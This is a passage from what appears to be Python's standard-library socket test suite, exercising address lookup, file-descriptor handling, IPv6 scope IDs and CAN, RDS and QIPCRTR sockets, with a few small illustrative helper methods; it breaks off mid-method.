if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if sys.platform != 'OpenVMS':
# OpenVMS has no http service
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
                # The arguments here are undefined and the call may succeed
                # or fail.  All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
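    # Illustrative sketch (a hypothetical helper, not collected by the
    # test runner): each 5-tuple returned by getaddrinfo() can be passed
    # straight to socket() and connect(), giving the canonical client
    # connect loop.
    def _demo_getaddrinfo_connect(self, host, port):
        for family, type_, proto, canonname, sockaddr in \
                socket.getaddrinfo(host, port, type=socket.SOCK_STREAM):
            try:
                with socket.socket(family, type_, proto) as s:
                    s.connect(sockaddr)
                    return sockaddr
            except OSError:
                continue
        raise OSError('could not connect to %r' % ((host, port),))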
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it fails =-")
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
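    # Illustrative sketch (not collected by the test runner): the
    # module-level socket.close(fd) closes a raw file descriptor without
    # needing a socket object, e.g. one obtained from detach().
    def _demo_module_level_close(self):
        s = socket.socket()
        fd = s.detach()     # s no longer owns the descriptor
        socket.close(fd)    # close it via the module-level helper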
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
    @unittest.skipUnless(
        sys.platform == 'win32',
        'Numeric scope id does not work or is undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
        # Also works on Linux and Mac OS X, but is not documented (?)
        # Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
    @unittest.skipUnless(sys.platform == 'win32',
                         'Numeric scope id does not work or is undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
        # To do this we fool socket.socket into believing it already has an
        # open fd, because on this path it doesn't actually verify the family
        # and type and simply populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
            # Some OSes, such as macOS, ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if sys.platform != 'OpenVMS' and hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS fails')
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS fails')
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
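    # Illustrative sketch (not collected by the test runner):
    # build_can_frame() and dissect_can_frame() are inverses for payloads
    # of up to 8 bytes, the CAN 2.0 frame limit, since the padding added
    # by build_can_frame() is stripped again using can_dlc.
    def _demo_can_frame_roundtrip(self):
        frame = self.build_can_frame(0x123, b'\x01\x02')
        self.assertEqual(self.dissect_can_frame(frame),
                         (0x123, 2, b'\x01\x02'))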
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
